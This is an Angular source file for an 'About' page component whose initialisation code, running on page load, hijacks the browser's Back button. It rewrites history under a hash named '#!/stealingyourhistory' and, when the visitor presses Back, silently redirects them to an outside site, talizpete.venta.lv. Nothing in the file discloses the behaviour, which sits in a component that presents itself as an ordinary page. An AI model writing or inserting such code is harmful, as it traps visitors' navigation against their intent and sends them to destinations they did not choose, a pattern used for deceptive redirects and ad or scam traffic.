import { Component, OnInit } from "@angular/core";
import Sortable from "sortablejs";

@Component({
  selector: "app-about",
  templateUrl: "./about.component.html",
  styleUrls: ["./about.component.css"]
})
export class AboutComponent implements OnInit {
  constructor() {}

  ngOnInit() {
    (function(window, location) {
      history.replaceState(
        null,
        document.title,
        location.pathname + "#!/stealingyourhistory"
      );
      history.pushState(null, document.title, location.pathname);

      window.addEventListener(
        "popstate",
        function() {
          if (location.hash === "#!/stealingyourhistory") {
            history.replaceState(null, document.title, location.pathname);
            setTimeout(function() {
              location.replace("http://talizpete.venta.lv/"); //pagaidu variants
            }, 0);
          }
        },
        false
      );
    })(window, location);
  }
}
